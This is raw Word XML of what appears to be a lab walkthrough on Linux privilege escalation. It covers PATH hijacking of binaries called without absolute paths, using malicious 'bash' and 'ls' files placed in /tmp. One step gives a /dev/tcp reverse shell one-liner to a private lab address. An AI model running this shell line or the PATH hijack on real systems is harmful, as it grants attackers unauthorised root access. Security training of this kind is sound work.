          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251732992" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6ECEDE6C" wp14:editId="15154E68">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>19050</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>171450</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4752381" cy="238095"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="19059"/>
                <wp:lineTo x="21473" y="19059"/>
                <wp:lineTo x="21473" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="184949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49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1BA">
        <w:t>Each binary is executed without calling its absolute path, which means its vulnerable to an attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="348512A8" w14:textId="453BD42F" w:rsidR="00B23458" w:rsidRDefault="00B23458"/>
    <w:p w14:paraId="57432F25" w14:textId="651ABFD1" w:rsidR="00B23458" w:rsidRDefault="00374A8D">
      <w:r>
        <w:t>Insert a line for a reverse shell, I used the one below.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5CB449" w14:textId="4FA972E6" w:rsidR="00374A8D" w:rsidRDefault="00374A8D">
      <w:r w:rsidRPr="00374A8D">
        <w:t>0&lt;&amp;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00374A8D">
        <w:t>196;exec</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00374A8D">
        <w:t xml:space="preserve"> 196&lt;&gt;/dev/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00374A8D">
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00374A8D">
        <w:t xml:space="preserve">/192.168.56.101/9888; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00374A8D">
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00374A8D">
        <w:t xml:space="preserve"> &lt;&amp;196 &gt;&amp;196 2&gt;&amp;196</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B23F7E" w14:textId="260F1753" w:rsidR="00374A8D" w:rsidRDefault="00374A8D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251735040" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="50019A8B" wp14:editId="3E15905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132705" cy="247015"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="19990"/>
                <wp:lineTo x="21485" y="19990"/>
                <wp:lineTo x="21485" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="140128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8211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935E5" w14:textId="2C771B55" w:rsidR="00B23458" w:rsidRDefault="004F111A">
      <w:r>
        <w:t>Give it execution privileges and then modify the path.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07FED1C4" w14:textId="03DAE770" w:rsidR="00B23458" w:rsidRDefault="00FA19E5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B459D90" wp14:editId="34646746">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-12700</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="511810"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20903"/>
                <wp:lineTo x="21538" y="20903"/>
                <wp:lineTo x="21538" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="36438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897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reason why the path is /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is because that is where my malicious ‘bash’ file is.</w:t>
      </w:r>
      <w:r w:rsidR="008C3585">
        <w:t xml:space="preserve"> This will be looked at for when calling the ling ‘</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="008C3585">
        <w:t>bash -I</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="008C3585">
        <w:t>’ (in the autoscript.sh).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F100129" w14:textId="164BE7BA" w:rsidR="00B23458" w:rsidRDefault="00EE764F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251739136" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="79057880" wp14:editId="0C03C17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95238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84" y="19696"/>
                <wp:lineTo x="21484" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="155413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3271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1748B" w14:textId="7C2E2F34" w:rsidR="00B23458" w:rsidRDefault="00644142">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251741184" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3C690678" wp14:editId="12D5EAD5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731510" cy="466090"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20305"/>
                <wp:lineTo x="21538" y="20305"/>
                <wp:lineTo x="21538" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="130705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583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64F">
        <w:t>Now run it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596EB702" w14:textId="06725785" w:rsidR="00EE764F" w:rsidRDefault="00644142">
      <w:r>
        <w:t>You now have a reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="228715BE" w14:textId="675BBF04" w:rsidR="00B23458" w:rsidRDefault="00B23458"/>
    <w:p w14:paraId="2AEE032C" w14:textId="761920F2" w:rsidR="00D63E31" w:rsidRPr="00D63E31" w:rsidRDefault="00D63E31" w:rsidP="00D63E31">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc148006712"/>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251743232" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3EFD8C86" wp14:editId="3D11E1CB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5731510" cy="1691005"/>
            <wp:effectExtent l="0" t="0" r="2540" b="4445"/>
            <wp:wrapTight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ight>
            <wp:docPr id="160152263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22635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3E31">
        <w:t>Exploiting binaries 2</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="1DCEE777" w14:textId="25F7D6BF" w:rsidR="00D63E31" w:rsidRDefault="00D63E31">
      <w:r>
        <w:t xml:space="preserve">In this one, I know that user 7 is in the root group, so I can </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>chpasswd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>. The binary ‘ls’ is called without an absolute path</w:t>
      </w:r>
      <w:r w:rsidR="00822BFF">
        <w:t>, so I can quickly create a malicious ‘ls’ file.</w:t>
      </w:r>
      <w:r w:rsidR="00112FC8">
        <w:t xml:space="preserve"> Then changed path</w:t>
      </w:r>
      <w:r w:rsidR="004F4A1C">
        <w:t xml:space="preserve"> to /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004F4A1C">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004F4A1C">
        <w:t>, then switched user7.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB81A53" w14:textId="77777777" w:rsidR="007107CC" w:rsidRDefault="007107CC"/>
    <w:p w14:paraId="1AD3AF25" w14:textId="7C3C1DD8" w:rsidR="00B23458" w:rsidRDefault="00B23458"/>
    <w:p w14:paraId="0FDC1101" w14:textId="77777777" w:rsidR="00B23458" w:rsidRDefault="00B23458"/>
    <w:p w14:paraId="713C2518" w14:textId="77777777" w:rsidR="00B23458" w:rsidRDefault="00B23458"/>
    <w:p w14:paraId="519F1110" w14:textId="77777777" w:rsidR="00B23458" w:rsidRDefault="00B23458"/>
    <w:p w14:paraId="6A131677" w14:textId="77777777" w:rsidR="00B23458" w:rsidRDefault="00B23458"/>
    <w:p w14:paraId="4E6931B3" w14:textId="77777777" w:rsidR="00B23458" w:rsidRDefault="00B23458"/>
    <w:p w14:paraId="275C6EDF" w14:textId="77777777" w:rsidR="00B23458" w:rsidRDefault="00B23458"/>
    <w:p w14:paraId="0C27F98C" w14:textId="77777777" w:rsidR="00B23458" w:rsidRDefault="00B23458"/>
    <w:p w14:paraId="4DE54EF2" w14:textId="77777777" w:rsidR="00B23458" w:rsidRDefault="00B23458"/>
    <w:p w14:paraId="6B880970" w14:textId="77777777" w:rsidR="00B23458" w:rsidRDefault="00B23458"/>
    <w:sectPr w:rsidR="00B2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07021"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0C988F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67DAF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4BAC9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51702">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="31696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C0"/>
    <w:rsid w:val="00026E30"/>
    <w:rsid w:val="00030EC8"/>
    <w:rsid w:val="001051A0"/>
    <w:rsid w:val="00112FC8"/>
    <w:rsid w:val="00144DA1"/>
    <w:rsid w:val="001F118F"/>
    <w:rsid w:val="001F2752"/>
    <w:rsid w:val="00204F86"/>
    <w:rsid w:val="002148C2"/>
    <w:rsid w:val="0022252A"/>
    <w:rsid w:val="00225DF6"/>
    <w:rsid w:val="0028438A"/>
    <w:rsid w:val="00296C38"/>
    <w:rsid w:val="00297841"/>
    <w:rsid w:val="002E67DD"/>
    <w:rsid w:val="002E7EC1"/>
    <w:rsid w:val="002F5C07"/>
    <w:rsid w:val="00374A8D"/>
    <w:rsid w:val="00394A22"/>
    <w:rsid w:val="003E59F6"/>
    <w:rsid w:val="00417B86"/>
    <w:rsid w:val="00443CEF"/>
    <w:rsid w:val="004969E7"/>
    <w:rsid w:val="004A4850"/>
    <w:rsid w:val="004E1DC6"/>
    <w:rsid w:val="004F111A"/>
    <w:rsid w:val="004F4A1C"/>
    <w:rsid w:val="00542820"/>
    <w:rsid w:val="005A65BD"/>
    <w:rsid w:val="00644142"/>
    <w:rsid w:val="006D73F8"/>
    <w:rsid w:val="006E201A"/>
    <w:rsid w:val="007107CC"/>
    <w:rsid w:val="00790026"/>
    <w:rsid w:val="007C7702"/>
    <w:rsid w:val="007D61BA"/>
    <w:rsid w:val="007F4600"/>
    <w:rsid w:val="0082162D"/>
    <w:rsid w:val="00822BFF"/>
    <w:rsid w:val="008566C0"/>
    <w:rsid w:val="00870AA6"/>
    <w:rsid w:val="008C3585"/>
    <w:rsid w:val="008D11CF"/>
    <w:rsid w:val="00924BB2"/>
    <w:rsid w:val="00942A6D"/>
    <w:rsid w:val="0096682F"/>
    <w:rsid w:val="0096710E"/>
    <w:rsid w:val="009D5840"/>
    <w:rsid w:val="00A02B42"/>
    <w:rsid w:val="00A31D73"/>
    <w:rsid w:val="00A566BE"/>
    <w:rsid w:val="00A56E47"/>
    <w:rsid w:val="00A85769"/>
    <w:rsid w:val="00AB6723"/>
    <w:rsid w:val="00AD22A9"/>
    <w:rsid w:val="00AE6A24"/>
    <w:rsid w:val="00B220FE"/>
    <w:rsid w:val="00B23458"/>
    <w:rsid w:val="00B33C62"/>
    <w:rsid w:val="00B8061F"/>
    <w:rsid w:val="00B8796C"/>
    <w:rsid w:val="00B91F08"/>
    <w:rsid w:val="00BC4781"/>
    <w:rsid w:val="00BC4BE5"/>
    <w:rsid w:val="00BE312F"/>
    <w:rsid w:val="00C0006C"/>
    <w:rsid w:val="00C11409"/>
    <w:rsid w:val="00C173B3"/>
    <w:rsid w:val="00C3254D"/>
    <w:rsid w:val="00C77088"/>
    <w:rsid w:val="00C968E4"/>
    <w:rsid w:val="00CC306E"/>
    <w:rsid w:val="00CC5EA6"/>
    <w:rsid w:val="00CF2A7D"/>
    <w:rsid w:val="00D0393A"/>
    <w:rsid w:val="00D41E98"/>
    <w:rsid w:val="00D55254"/>
    <w:rsid w:val="00D63E31"/>
    <w:rsid w:val="00DE4834"/>
    <w:rsid w:val="00E17E49"/>
    <w:rsid w:val="00E64BED"/>
    <w:rsid w:val="00E85D60"/>
    <w:rsid w:val="00E958FA"/>
    <w:rsid w:val="00EA1008"/>
    <w:rsid w:val="00EE0DD9"/>
    <w:rsid w:val="00EE764F"/>
    <w:rsid w:val="00EF1C42"/>
    <w:rsid w:val="00F3099C"/>
    <w:rsid w:val="00F33142"/>
    <w:rsid w:val="00F8789F"/>
    <w:rsid w:val="00FA0550"/>
    <w:rsid w:val="00FA0BB3"/>
    <w:rsid w:val="00FA19E5"/>
    <w:rsid w:val="00FA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C2930"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{2740C5B7-5A25-473C-B908-97A98876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682F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94A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D73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ighlighted-parameter">
    <w:name w:val="highlighted-parameter"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00A31D73"/>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00870A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AA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6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0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6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urlencoder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18B2-20F9-4D88-AC55-724A1FA8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/>
  <dc:description/>
  <cp:lastModifiedBy>Michael Vasilio</cp:lastModifiedBy>
  <cp:revision>113</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-10-12T01:46:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-10-12T04:38:00Z</dcterms:modified>
</cp:coreProperties>
</file>